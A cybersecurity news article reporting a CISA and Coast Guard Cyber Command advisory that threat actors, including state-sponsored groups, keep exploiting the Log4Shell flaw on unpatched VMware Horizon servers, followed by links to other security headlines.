Hackers are still exploiting infamous Log4Shell vulnerability to breach VMware Horizon servers

Hackers are still exploiting infamous Log4Shell vulnerability to breach VMware Horizon servers

Six months after fixing, hackers are still exploiting the infamous Log4Shell vulnerability to attack VMware Horizon and Unified Access Gateway servers to get the initial access to a victims’ networks.

According to a recent joint advisory published by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Coast Guard Cyber Command (CGCYBER), since December 2021, multiple threat actor groups, including the state-sponsored ones, have been exploiting Log4Shell on unpatched, public-facing VMware Horizon and Unified Access Gateway servers. In these attacks threat actors were observed planting malware on compromised systems with embedded executables enabling remote command-and-control.

The Log4Shell vulnerability (CVE-2021-44228) is a remote code execution flaw in a widely used Apache Log4j logging utility. Using this bug, a threat actor can send a specially-crafted command to an affected system, execute a malicious code, and get the control over the victim’s machine.

According to the joint advisory, the hackers use Log4Shell to deliver malicious payloads, including PowerShell scripts and hmsvc.exe, a remote access tool for keylogging and deploying additional malware.

The Log4Shell vulnerability was identified in November 2021 and patched a month later, three days before it was publicly disclosed. But an ongoing Log4Shell-related malicious campaign suggests that there are still a lot of unpatched servers, and the vulnerability is a very valuable asset for hackers, especially advanced persistent threat groups.

Back to the list

Latest Posts

Researchers caught embedding hidden AI prompts to sway research reviewers

Researchers caught embedding hidden AI prompts to sway research reviewers

The investigation analyzed English-language preprints published on the research platform arXiv and found concealed AI instructions in 17 papers.
7 July 2025
Brazilian programmer arrested for role in $185 million bank hack

Brazilian programmer arrested for role in $185 million bank hack

João Nazareno Roque, a junior back-end developer at C&M, was allegedly recruited by hackers in a bar in São Paulo.
7 July 2025
APT36 cyber-espionage campaign targeting Indian defense sector via BOSS Linux

APT36 cyber-espionage campaign targeting Indian defense sector via BOSS Linux

More recently, APT36 has shifted its focus to Linux-based environments.
7 July 2025